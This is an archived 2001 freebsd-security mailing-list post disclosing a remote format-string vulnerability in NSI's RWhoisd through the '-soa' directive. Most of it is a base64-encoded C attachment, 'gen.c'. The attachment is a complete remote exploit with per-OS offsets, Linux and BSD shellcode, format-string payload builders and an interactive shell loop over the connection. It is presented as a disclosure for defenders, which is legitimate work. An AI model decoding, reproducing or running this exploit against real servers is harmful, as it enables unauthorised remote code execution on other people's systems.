Date: Thu, 25 Oct 2001 19:25:51 +0200 (IST) From: root <root@cow.net> To: freebsd-security@freebsd.org Subject: RWhoisd remote format string vulnerability Message-ID: <Pine.LNX.4.10.10110251924230.5027-200000@cow.net>
next in thread | raw e-mail | index | archive | help
This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --8323328-1200701191-1004030751=:5027 Content-Type: TEXT/PLAIN; charset=US-ASCII Hello, there is a serious bug in RWhoisd by NSI on all versions. it is possible for a user to supply the format string passed to print_error() simpley by using the "-soa" directive. the results are obvious, we can write almost anywhere in the proc's memory thus executing code as the user running rwhoisd. (usually rwhoisd , but can easily become root if rwhoisd.conf writeable) --8323328-1200701191-1004030751=:5027 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="gen.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.10.10110251925510.5027@cow.net> Content-Description: Content-Disposition: attachment; filename="gen.c" LyogDQogICAgICAgMTcuNC4yMDAxICAgICAgICANCg0KICAgICAgIFJlbW90 ZSBFeHBsb2l0IGZvciB2ZXJzaW9ucyBvZg0KICAgICAgIFJXaG9pc2QgLi4u IChieSBOZXR3b3JrIFNvbHV0aW9ucywgSW5jLiBWLTEuNS54KSANCiAgICAg IA0KICAgICAgIHRoaXMgY29kZSBleHBsb2l0cyBhIGJ1ZyBpbiB0aGUgJy1z b2EnIGRpcmVjdGl2ZSANCiAgICAgICB0aGF0IGNhbGxzIHByaW50X2Vycm9y KCkgd2l0aCBhIHVzZXIgc3VwcGxpZWQgDQogICAgICAgZm9ybWF0IHN0cmlu Zy4NCg0KICAgICAgIGNyZWRpdCB0byByb2Igd2hvIGZvdW5kIHRoZSBoMGxl IA0KICAgICAgIGFuZCBtYWQgdGhhbmtzIHRvIGFsbCB0aGUgcGVvcGxlIHdo byBoZWxwZWQgbWUNCiAgICAgICB0ZXN0IHRoaXMgY29kZS4gICAgICAgDQoN CiAgICAgICB0aGVzZSB2ZXJzaW9ucyBhcmUgdnVsbmVyYWJsZSBvbiBhbGwg cGxhdGZvcm1zDQogICAgICAgbm90IG9ubHkgdGhlIG9uZXMgYXZhaWxhYmxl IGhlcmUuDQoNCiAgICAgICB5b3UgYmV0dGVyIHRyeSBtb3JlIHRoYW4gb25j ZSAsIGZvciBzb21lIHJlYXNvbg0KICAgICAgIGlmIHNvbWV0aW1lcyBmYWls cyBvbiBmaXJzdCBhdHRlbXB0cy4NCg0KICAgICAgIFRISVMgQ09ERSBJUyBG T1IgRURVQ0FUSU9OQUwgUFVSUE9TRVMgT05MWQ0KICAgICAgIA0KICAgICAg IGhhdmUgcGh1biwgQ293UG93ZXIuDQogICAgICAgDQoqLw0KDQojaW5jbHVk ZSA8c2lnbmFsLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5jbHVkZSA8 c3RkaW8uaD4NCiNpbmNsdWRlIDxzeXMvc29ja2V0Lmg+DQojaW5jbHVkZSA8 c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8bmV0aW5ldC9pbi5oPg0KI2luY2x1 ZGUgPG5ldGRiLmg+DQoNCiNkZWZpbmUgVkVSU0lPTiAgICAgICAgICAgICAg ICAgICAgICAgIDIuMA0KI2RlZmluZSBNQVgoeCx5KQkoKHg+eSk/eDp5KQ0K I2RlZmluZSBQT1JUCQkJICAgICAgIDQzMjENCg0KI2RlZmluZSBCVUZGCQkJ ICAgICAgIDI1MQ0KI2RlZmluZSBMRU4JCQkgICAgICAgMTAyNA0KDQoNCnN0 cnVjdCB2ZXJzaW9uIHsNCiAgICAgICAgY2hhciAqbmFtZTsNCglpbnQgcmV0 Ow0KICAgICAgICBpbnQgcmV0MTsNCglpbnQgc3RyOw0KfTsNCg0Kc3RydWN0 IHZlcnNpb24gdmVyc2lvbltdID0geyANCg0KICAgICAgewkiTGludXggeDg2 IChleGVjcHQgU2xhY2sgOC54KSIsLTE4NSwtMjMzLC01IH0gLA0KICAgICAg eyAiTGludXggeDg2IChTbGFja3dhcmUgOC54KSIsNTYsLTQwLDMyNCB9ICwg ICAgICAgICAgICAgIA0KICAgICAgeyAiRnJlZUJTRCAodmVyc2lvbiA8IDQu eCkiLC0xODksLTIzNywtNSB9ICwNCiAgICAgIHsgIk9wZW5CU0QsIEZyZWVC U0QgNC54Iiw1NiwtNDAsMzI0IH0gLCANCiAJCQkwDQp9Ow0KDQovKiAgbW9k aWZpZWQgc2hlbGxjb2RlcyB3aG8gY29udGFpbiBubyBuYXN0eSBjb250cm9s IGNoYXJzICg8PTB4MjApICAqLw0KDQpjaGFyICpldmlsY29kZVtdID0gew0K DQoiXHgzMVx4YzBceDMxXHhkYlx4MzFceGM5XHg0M1x4NDFceDQxXHhiMFx4 M2ZceGNkXHg4MCINCiJceGViXHgyNVx4NWVceDg5XHhmM1x4ODNceGMzXHhl MFx4ODlceDczXHgyOFx4MzFceGMwXHg4OFx4NDNceDI3XHg4OVx4NDMiDQoi XHgyY1x4ODNceGU4XHhmNVx4OGRceDRiXHgyOFx4OGRceDUzXHgyY1x4ODlc eGYzXHhjZFx4ODBceDMxXHhkYlx4ODlceGQ4Ig0KIlx4NDBceGNkXHg4MFx4 ZThceGQ2XHhmZlx4ZmZceGZmL2Jpbi9zaCIgICwNCg0KInNhbWUgYXMgbGlu dXggc2hlbGxjb2RlIiAsIA0KDQoiXHgzMVx4YzBceDJjXHhmZVx4NTBceGZl XHhjOFx4NTBceDUwXHgyY1x4YTdceGNkXHg4MCINCiJceGViXHgyYVx4NWVc eDhkXHg1ZVx4ZTBceDg5XHg3M1x4MmJceDMxXHhkMlx4ODlceDUzXHgyN1x4 ODlceDUzXHgyZiINCiJceDg5XHg1M1x4MzRceDg4XHg1M1x4MzlceDMxXHhj MFx4YjBceDNiXHg4ZFx4NGJceDJiXHg4MFx4NmJceDM4XHgzMCINCiJceDgw XHg2ZVx4ZmFceDMwXHg1MVx4NTFceDU2XHg1MFx4ZWJceDQ4XHhlOFx4ZDFc eGZmXHhmZlx4ZmYvYmluL3NoIg0KInh4eHh4eHh4eHh4eCIgIlx4OWEiICAi eHh4eCIgICJceDM3IiAgIngiICAsIA0KDQogICJzYW1lIGFzIGZyZWVic2Qg c2hlbGxjb2RlIiAsIA0KICANCn0gOw0KDQpjaGFyICpzaGVsbGNvZGU7DQp1 bnNpZ25lZCBsb25nIGludCByZXQsbWVtOw0KaW50IHZlcjsNCg0Kdm9pZCAq ZXJyKGNoYXIgKik7DQp2b2lkICppbnRyKHZvaWQpOw0Kdm9pZCAqdGltZW91 dCh2b2lkKTsNCmludCBvayh2b2lkKTsNCmNoYXIgKmFuc3dlcihjaGFyICos Y2hhciAqLGludCxpbnQpOw0KY2hhciAqbWFrZWFkZCh1bnNpZ25lZCBsb25n IGludCxpbnQsY2hhciAqKTsNCmNoYXIgKm1ha2VidWYoaW50LGNoYXIgKixp bnQpOw0KDQoNCiBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAg IA0KICAgICAgICBjaGFyIHNlbmRsbltMRU5dLCByZWN2bG5bTEVOXSwqcHRy Ow0KICAgICAgICBpbnQgaSxzb2NrZmQsIG1heGZkLCBic2l6ZTsNCiAgICAg ICAgc3RydWN0IHNvY2thZGRyX2luIGNsaTsNCiAgICAgICAgc3RydWN0IGhv c3RlbnQgKmhwOw0KICAgICAgICBmZF9zZXQgcnNldDsNCg0KDQoJZnByaW50 ZihzdGRlcnIsIlJXaG9pc2QgcmVtb3RlIGV4cGxvaXQgdiUuMWYgYnkgTW9v MFxuIixWRVJTSU9OKTsNCiAgICAgDQogICAgIG1heGZkID0gKHNpemVvZih2 ZXJzaW9uKSAvIHNpemVvZih2ZXJzaW9uWzBdKSkgLSAyOw0KDQogICAgICAg ICBpZiAoYXJnYyA8IDMpIHsNCgkJZnByaW50ZihzdGRlcnIsInVzYWdlOiAl cyA8aG9zdD4gPHZlcnNpb24gbnVtYmVyPg0KCQkJCVxyYXZhaWxhYmxlIHN1 cHBvcnQ6XG4iLGFyZ3ZbMF0pOw0KCQlmb3IgKGk9MDt2ZXJzaW9uW2ldLm5h bWU7aSsrKQ0KCQkJZnByaW50ZihzdGRlcnIsIiglZClcdCVzXG4iLGksdmVy c2lvbltpXS5uYW1lKTsNCgkgICAgICAgIGV4aXQoLTEpOw0KICAgfQ0KICAg IA0KICAgIGZvcihpPTA7YXJndlsyXVtpXTtpKyspIGlmICghaXNkaWdpdChh cmd2WzJdW2ldKSkgDQoJZXJyKCJ2ZXJzaW9uIG5vdCBhdmFpbGFibGUuXG4i KTsNCg0KIHZlciA9IGF0b2koYXJndlsyXSk7DQogICAgICBpZiAoISh2ZXIg PD0gbWF4ZmQpKSAgZXJyKCJ2ZXJzaW9uIG5vdCBhdmFpbGFibGUuXG4iKTsN CgkNCg0Kc2lnbmFsKFNJR0lOVCwodm9pZCAqKWludHIpOw0Kc2lnbmFsKFNJ R0FMUk0sKHZvaWQgKil0aW1lb3V0KTsNCg0KZXZpbGNvZGVbMV0gPSBldmls Y29kZVswXTsgDQpldmlsY29kZVszXSA9IGV2aWxjb2RlWzJdOw0KDQpzaGVs bGNvZGUgPSBldmlsY29kZVt2ZXJdOwkgICANCg0KICAgZnByaW50ZihzdGRl cnIsIlRhcmdldDogJXNcblwNCk9wZXJhdGluZyBTeXN0ZW06ICVzXG4iLGFy Z3ZbMV0sdmVyc2lvblt2ZXJdLm5hbWUpOw0KDQogICAgICAgIGlmKChzb2Nr ZmQgPSBzb2NrZXQoQUZfSU5FVCwgU09DS19TVFJFQU0sIDApKSA8IDApew0K ICAgICAgICAgICAgICAgIHBlcnJvcigiU29ja2V0Iik7DQogICAgICAgICAg ICAgICAgZXhpdCgtMSk7ICB9DQoNCiAgICAgICAgaWYoKGhwID0gZ2V0aG9z dGJ5bmFtZShhcmd2WzFdKSkgPT0gTlVMTCl7DQogICAgICAgICAgICAgICAg cHJpbnRmKCJFcnJvcjogJXNcbiIsIGhzdHJlcnJvcihoX2Vycm5vKSk7DQog ICAgICAgICAgICAgICAgZXhpdCgtMSk7DQogICAgICAgIH0NCg0KICAgICAg ZnB1dHMoIkNvbm5lY3RpbmcgdG8gUldob2lzZC4uLi4iLHN0ZGVycik7DQog IA0KICAgICBiemVybygmY2xpLCBzaXplb2YoY2xpKSk7DQoNCiAgICAgICAg Y2xpLnNpbl9mYW1pbHkgPSBBRl9JTkVUOw0KICAgICAgICBjbGkuc2luX3Bv cnQgPSBodG9ucyhQT1JUKTsNCiAgICAgICAgbWVtY3B5KChjaGFyICopJmNs aS5zaW5fYWRkciwgaHAtPmhfYWRkcl9saXN0WzBdLCBocC0+aF9sZW5ndGgp Ow0KICAgICAgICBpZihjb25uZWN0KHNvY2tmZCwgKHN0cnVjdCBzb2NrYWRk ciAqKSZjbGksIHNpemVvZihjbGkpKSA8IDApew0KICAgICAgICAgICAgICAg IHBlcnJvcigiIik7DQogICAgICAgICAgICAgICAgZXhpdCgtMSk7DQogICAg ICAgIH0NCg0KICBhbnN3ZXIoMCxyZWN2bG4sc29ja2ZkLDApOw0KDQogICAg DQogICAgIGZvciAoaT0wO2k8ODtpKyspIHJlY3ZsbltpXSA9IHRvbG93ZXIo cmVjdmxuW2ldKTsgICAgICAgIA0KDQogICAgICAgaWYoc3RybmNtcChyZWN2 bG4sIiVyd2hvaXMiLDcpKSANCiAgICAgZXJyKCJDb25uZWN0ZWQsXG5CdXQg aXRzIG5vdCBSV2hvaXNkLCBBYm9ydGluZy5cbiIpOyANCiANCiAgICAgICBm cHV0cygiQ29ubmVjdGVkLlxuIixzdGRlcnIpOw0KICAgICAgc2xlZXAoMSk7 DQogICAgICAgZnB1dHMoIkJ1aWxkaW5nIGV2aWwtc3RyaW5nOlxuIixzdGRl cnIpOw0KICAgIA0KICAgICAgIHN0cmNweShzZW5kbG4sIi1zb2EgJXBcbiIp Ow0KDQogICAgICAgIGFuc3dlcihzZW5kbG4scmVjdmxuLHNvY2tmZCwwKTsN Cg0KICAgICBpZiAoc3RyY21wKHJlY3ZsbiwiJWVycm9yIDM0MCBJbnZhbGlk IEF1dGhvcml0eSBBcmVhIikpIA0KICAgICAgIGVycigiQ2FudCByZWFkIG5l Y2Vzc2FyeSBkYXRhLlxuIik7DQoNCmVsc2Ugew0KICAgICAgICBhbnN3ZXIo c2VuZGxuLHJlY3Zsbixzb2NrZmQsMSk7DQogICAgICAgIHB0ciA9IChjaGFy ICopc3Ryc3RyKHJlY3ZsbiwiMHgiKSA7DQoJaWYgKCFwdHIpIGVycigiRGF0 YSBkb2VzbnQgbWF0Y2ggdmVyaXNvbiBnaXZlbi5cbiIpOw0KICAgfQ0KICAg ICAgICBtZW0gPSBzdHJ0b3VsKHB0ciwodm9pZCAqKTAsMTYpOw0KDQogICAg ICAgIHJldCA9ICgobWVtK3ZlcnNpb25bdmVyXS5yZXQpJjB4ZmYpPjB4MjA/ KG1lbSt2ZXJzaW9uW3Zlcl0ucmV0KToNCgkobWVtK3ZlcnNpb25bdmVyXS5y ZXQxKTsNCg0KICAgICAgICBpZiAoIW9rKCkpIGVycigiSW1wb3NzaWJsZSBD b25kaXRpb25zLCBBYm9ydGluZy5cbiIpOw0KDQoNCiAgICAgICAgZnByaW50 ZihzdGRlcnIsIkFzc3VtZWQgRUlQIEFkZHJlc3M6ICUjeFxuIixyZXQpOw0K DQoJYW5zd2VyKG1ha2VidWYoQlVGRixyZWN2bG4sMSkscmVjdmxuLHNvY2tm ZCwxKTsNCg0KICAgICAgICBwdHIgPSAoY2hhciAqKXN0cnN0cihyZWN2bG4s Ijc4Nzg3ODAwIikgIDsgICAgICANCiAgICAgICANCg0KICAgICAgIGlmKCFw dHIpIGVycigwKTsNCg0KICAgICAgIGJzaXplID0gQlVGRiAtIChzdHJsZW4o cHRyKSAvIDQpIDsNCg0KICAgICAgICBtZW0gKz0gIHZlcnNpb25bdmVyXS5z dHIgKyBic2l6ZSArIDggKyAoMyo2KSArICgzKjMpOyAgICAgICAgICAgICAg ICANCg0KICAgICAgIGZwcmludGYoc3RkZXJyLCJBc3N1bWVkIHNoZWxsY29k ZSBhZGRyZXNzOiAlI3hcbiIsbWVtKTsNCiAgICAgICBtYXhmZCA9ICggc3Ry bGVuKHJlY3ZsbikgLSBzdHJsZW4ocHRyKSArIDYgKSAmIDB4ZmYgOw0KDQog ICAgICAgbWFrZWJ1Zihic2l6ZSxzZW5kbG4sMCk7ICANCiAgICAgICBtYWtl YWRkKG1lbSxtYXhmZCxyZWN2bG4pOyANCg0KICAgICAgIHNlbmRsbltzdHJs ZW4oc2VuZGxuKS0xXSA9ICdcMCc7DQogICAgICAgc3RyY2F0KHNlbmRsbixy ZWN2bG4pOw0KDQogICAgIGFuc3dlcihzZW5kbG4scmVjdmxuLHNvY2tmZCwx KTsNCg0KICAgICBwdHIgPSAoY2hhciAqKXN0cnN0cihyZWN2bG4sInh4eCIp IDsNCg0KICAgICAgICBpZiAoIXB0cikgZXJyKDApOyANCg0KICAgICAgKigo Y2hhciAqKXN0cnN0cihwdHIsIjc4Nzg3ODAwIikrOCkgPSAnXDAnOw0KDQog ICAgIGkgPSAoKHN0cmxlbihwdHIpKSAmIDB4ZmYpIC0gIChtZW0gJiAweGZm KSA7DQoNCg0KICAgICAgICBtYWtlYnVmKGJzaXplLHNlbmRsbiwxKTsgbWFr ZWFkZChtZW0sbWF4ZmQraSxyZWN2bG4pOw0KICAgICAgICBzZW5kbG5bc3Ry bGVuKHNlbmRsbiktMV0gPSAnXDAnOw0KICAgICAgICBzdHJjYXQoc2VuZGxu LHJlY3Zsbik7ICANCg0KICAgICAgZnB1dHMoIlNlbmRpbmcgZXZpbC1zdHJp bmcgLCBXYWl0aW5nIGZvciBSZXNwb25zZS4uLi4iLHN0ZGVycik7DQoNCiAg ICAgYW5zd2VyKHNlbmRsbixyZWN2bG4sc29ja2ZkLDEpOw0KDQogICAgICAg YW5zd2VyKCJlY2hvIC1uIFwib2lua1wiO1xuIixyZWN2bG4sc29ja2ZkLDAp Ow0KDQogICAgICAgIGlmIChzdHJjbXAocmVjdmxuLCJvaW5rIikpICB7IA0K CSAgICAgYW5zd2VyKDAscmVjdmxuLHNvY2tmZCwwKTsNCiAgICAgICAgICAg ICBpZiAoc3RyY21wKHJlY3Zsbiwib2luayIpKSBlcnIoMCk7CX0NCg0KICAg ICAgICBmcHV0cygiU3VjY2VzcyFcbiIsc3RkZXJyKTsgICAgICAgIA0KDQog ICAgICAgIHN0cmNweShzZW5kbG4sInVuYW1lIC1hO1xuIik7DQogICAgICAg IHdyaXRlKHNvY2tmZCxzZW5kbG4sc3RybGVuKHNlbmRsbikpOw0KICAgICAg ICBzbGVlcCgxKTsNCiAgICAgICAgZnB1dHMoc2VuZGxuLHN0ZGVycik7DQoN CiAgICAgIHNpZ25hbChTSUdJTlQsU0lHX0lHTik7DQoNCiAgICAgICBiemVy byhzZW5kbG4sIExFTik7DQoNCiAgICAgICAgRkRfWkVSTygmcnNldCk7DQog ICAgICAgIGZvcig7Oyl7DQogICAgICAgICAgICAgICAgRkRfU0VUKGZpbGVu byhzdGRpbiksICZyc2V0KTsNCiAgICAgICAgICAgICAgICBGRF9TRVQoc29j a2ZkLCAmcnNldCk7DQogICAgICAgICAgICAgICAgbWF4ZmQgPSBNQVgoZmls ZW5vKHN0ZGluKSwgc29ja2ZkKSArIDE7DQogICAgICAgICAgICAgICAgc2Vs ZWN0KG1heGZkLCAmcnNldCwgTlVMTCwgTlVMTCwgTlVMTCk7DQogICAgICAg ICAgICAgICAgaWYoRkRfSVNTRVQoZmlsZW5vKHN0ZGluKSwgJnJzZXQpKXsN Cg0KICAgICAgICAgICAgICAgICAgICAgICAgZmdldHMoc2VuZGxuLCBzaXpl b2Yoc2VuZGxuKS0yLCBzdGRpbik7DQogICAgICAgICAgICAgICAgICAgICAg ICB3cml0ZShzb2NrZmQsIHNlbmRsbiwgc3RybGVuKHNlbmRsbikpOw0KIAkJ CWJ6ZXJvKHNlbmRsbiwgTEVOKTsNCiANCiAgICAgICAgICAgICAgIH0NCiAg ICAgICAgICAgICAgICBpZihGRF9JU1NFVChzb2NrZmQsICZyc2V0KSl7DQog ICAgICAgICAgICAgICAgICAgICAgICBiemVybyhyZWN2bG4sIExFTik7DQog ICAgICAgICAgICAgICAgICAgICAgICBpZigNCiAgICAgIChpID0gcmVhZChz b2NrZmQsIHJlY3Zsbiwgc2l6ZW9mKHJlY3ZsbikpKT09IDApew0KICAgICAg ICAgICAgICAgICAgICAgcHJpbnRmKCJoYWNrZXJ6LlxuIik7DQogICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgIGV4aXQoMCk7DQogICAgICAgICAg ICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgICAgICAgICBpZihp IDwgMCl7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBlcnJv cigicmVhZCIpOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBl eGl0KC0xKTsNCiAgICAgICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAg ICAgICAgICAgICAgICAgIGZwdXRzKHJlY3Zsbiwgc3Rkb3V0KTsNCiAgICAg ICAgICAgICAgICB9DQogICAgICAgIH0NCn0NCg0KDQpjaGFyICptYWtlYnVm KGludCBsZW4sY2hhciAqYnVmLGludCByZWFsKSAgew0KDQoJY2hhciAqYnVm ZiwqcHRyOw0KICAgICAgICB1bnNpZ25lZCBsb25nIGFkZHI7DQoJaW50IGk7 DQoNCmJ6ZXJvKGJ1ZmYgPSBtYWxsb2MobGVuKSxsZW4pOw0KDQogZm9yIChp ID0gMDsgaSA8IGxlbi0xOyBpKz0yKSBzdHJjYXQoYnVmZiwiJXgiKTsNCg0K aWYgKHJlYWwpIGFkZHIgPSByZXQ7DQoNCmVsc2UgYWRkciA9IChtZW0gJiAw eGZmKT4weDIwP21lbTptZW0rMzM7DQoNCnB0ciA9IGJ1ZmY7DQoNCiAgICoo cHRyKyspID0gICAoYWRkciAmIDB4ZmYpIDsNCiAgICoocHRyKyspID0gIChh ZGRyICYgMHhmZjAwKSA+PiA4IDsNCiAgICoocHRyKyspID0gIChhZGRyICYg MHhmZjAwMDApID4+IDE2IDsNCiAgICoocHRyKyspID0gIChhZGRyICYgMHhm ZjAwMDAwMCkgPj4gMjQgOw0KICANCiBtZW1jcHkocHRyLCJBQUFBIiw0KTsN Cg0KcHRyICs9IDQ7DQoNCmkgPSAzOw0KDQp3aGlsZSAoaS0tKSB7DQogICAg DQogICBhZGRyKys7DQoNCiAgICoocHRyKyspID0gICAoYWRkciAmIDB4ZmYp IDsNCiAgICoocHRyKyspID0gIChhZGRyICYgMHhmZjAwKSA+PiA4IDsNCiAg ICoocHRyKyspID0gIChhZGRyICYgMHhmZjAwMDApID4+IDE2IDsNCiAgICoo cHRyKyspID0gIChhZGRyICYgMHhmZjAwMDAwMCkgPj4gMjQgOw0KfQ0KDQoN CnNwcmludGYoYnVmLCItc29hIHh4eCVzXG4iLGJ1ZmYpOw0KDQpmcmVlKGJ1 ZmYpOw0KcmV0dXJuKGJ1Zik7DQogIA0KfQ0KDQpjaGFyICptYWtlYWRkKHVu c2lnbmVkIGxvbmcgaW50IG1lbSxpbnQgdXMsY2hhciAqYWRkKSB7DQoNCiAg ICAgICBjaGFyIGFsbW9nWzQwMF0sc2VuZGxuWzEwMF0sKnB0cjsNCiAgICAg IGludCBtYXhmZCxnb2FsOw0KICAgDQoJICAgZ29hbCA9IChtZW0gJiAweGZm KTsNCg0KICAgICAgICBtYXhmZCA9IChnb2FsIC0gdXMpPDA/KGdvYWwrMjU2 LXVzKTooZ29hbC11cyk7DQoNCiAgICAgICAgc3ByaW50ZihhZGQsIiUlLiVk eCVzIixtYXhmZCs4LCIlaG4iKTsNCg0KICAgICAgICB1cyA9IGdvYWwrIDg7 DQogICAgICAgIGdvYWwgPSAgKG1lbSAmIDB4ZmYwMCkgPj4gOCA7DQoNCiAg ICAgIG1heGZkID0gKGdvYWwgLSB1cyk8MD8oZ29hbCsyNTYtdXMpOihnb2Fs LXVzKTsNCg0KICAgICAgIHNwcmludGYoYWRkLCIlcyUlLiVkeCVzIixhZGQs bWF4ZmQrOCwiJWhuIik7DQoNCiAgICAgICBtZW1zZXQoYWxtb2csJ1x4OTAn LDMwMCk7DQogICAgICAgYWxtb2dbMzAwXSA9ICdcMCc7DQogICAgICAgIA0K DQogICAgICAgIHVzID0gZ29hbCA7DQogICAgICAgIGdvYWwgPSAgKG1lbSAm IDB4ZmYwMDAwKSA+PiAxNiA7DQoNCiAgICAgICBtYXhmZCA9IChnb2FsIC0g dXMpPDA/KGdvYWwrMjU2LXVzKTooZ29hbC11cyk7DQoNCiAgICAgICBzcHJp bnRmKHNlbmRsbiwiJSVzJSUuJWRzIixtYXhmZCk7DQoNCmlmICh2ZXIgPiAx KSB7DQogICAgICAgcHRyID0gYWxtb2cgKyAobWF4ZmQgLSBzdHJsZW4oc2hl bGxjb2RlKSk7DQoNCiAgICAgIG1lbWNweShwdHIsc2hlbGxjb2RlLHN0cmxl bihzaGVsbGNvZGUpKTsNCg0KCX0NCg0KICAgICAgc3ByaW50ZihhZGQsc2Vu ZGxuLGFkZCxhbG1vZyk7DQoNCiAgICAgIHN0cmNhdChhZGQsIiVobiIpOw0K DQogICAgICB1cyA9IGdvYWwgOw0KICAgICAgZ29hbCA9ICAobWVtICYgMHhm ZjAwMDAwMCkgPj4gMjQgOw0KDQogICAgbWF4ZmQgPSAoZ29hbCAtIHVzKTww Pyhnb2FsKzI1Ni11cyk6KGdvYWwtdXMpOw0KDQogICAgICAgc3ByaW50Zihz ZW5kbG4sIiUlcyUlLiVkcyIsbWF4ZmQpOw0KDQppZiAodmVyIDw9IDEpIHsg ICANCiAgICAgIHB0ciA9IGFsbW9nICsgKG1heGZkIC0gc3RybGVuKHNoZWxs Y29kZSkpOw0KDQogICAgICBtZW1jcHkocHRyLHNoZWxsY29kZSxzdHJsZW4o c2hlbGxjb2RlKSk7DQoJfQ0KICAgICBzcHJpbnRmKGFkZCxzZW5kbG4sYWRk LGFsbW9nKTsNCiAgICAgICAgc3RyY2F0KGFkZCwiJWhuXG4iKTsNCg0KIHJl dHVybihhZGQpOw0KDQp9DQoNCg0KY2hhciAqYW5zd2VyKGNoYXIgKnNlbmRs bixjaGFyICpyZWN2bG4saW50IHNvY2tmZCxpbnQgZXh0cmEpIHsNCg0KICAg ICAgIGFsYXJtKDE1KTsgIA0KICAgICAgaWYgKHNlbmRsbikgd3JpdGUoc29j a2ZkLHNlbmRsbixzdHJsZW4oc2VuZGxuKSk7DQogICAgICBpZiAoZXh0cmEp IHJlYWQoc29ja2ZkLHJlY3ZsbixMRU4pIDsNCiAgICAgICAgYnplcm8ocmVj dmxuLCBMRU4pOw0KICAgICAgICByZWFkKHNvY2tmZCxyZWN2bG4sTEVOKSA7 DQoNCiAgICAgIGFsYXJtKDApOw0KICAgICAgcmV0dXJuKHJlY3Zsbik7DQoN Cn0NCg0KDQp2b2lkICppbnRyKHZvaWQpIHsNCg0KZmZsdXNoKHN0ZG91dCk7 DQoNCmZwdXRzKCJcbkludGVycnVwdGlvbiBmcm9tIGtleWJvYXJkLi4uYWJv cnRpbmcuXG4iLHN0ZGVycik7DQoNCmV4aXQoLTEpOw0KDQp9DQoNCnZvaWQg KnRpbWVvdXQodm9pZCkgew0KDQpmcHV0cygiVGltZW91dCFcbiIsc3RkZXJy KTsNCg0KZXhpdCgtMSk7DQp9DQoNCg0KDQppbnQgb2sodm9pZCkgew0KDQpp ZiAoICAgICAoKHJldCAmIDB4ZmYpID4gMHgyMCkNCiAgICAgJiYJKCgocmV0 ICYgMHhmZjAwKSA+PiA4KSA+IDB4MjApIA0KICAgICAmJiAoKChyZXQgJiAw eGZmMDAwMCkgPj4gMTYpID4gMHgyMCkNCiAgICAgJiYgKCgocmV0ICYgMHhm ZjAwMDAwMCkgPj4gMjQpICA+IDB4MjApICkgcmV0dXJuKDEpOw0KDQpyZXR1 cm4oMCk7DQoNCn0NCg0Kdm9pZCAqZXJyKGNoYXIgKm1zZykgew0KDQppZiAo bXNnKSBmcHV0cyhtc2csc3RkZXJyKTsNCmVsc2UgZnB1dHMoIkZhaWxlZC5c biIsc3RkZXJyKTsNCg0KZXhpdCgtMSk7DQoNCn0NCg0K --8323328-1200701191-1004030751=:5027-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.LNX.4.10.10110251924230.5027-200000>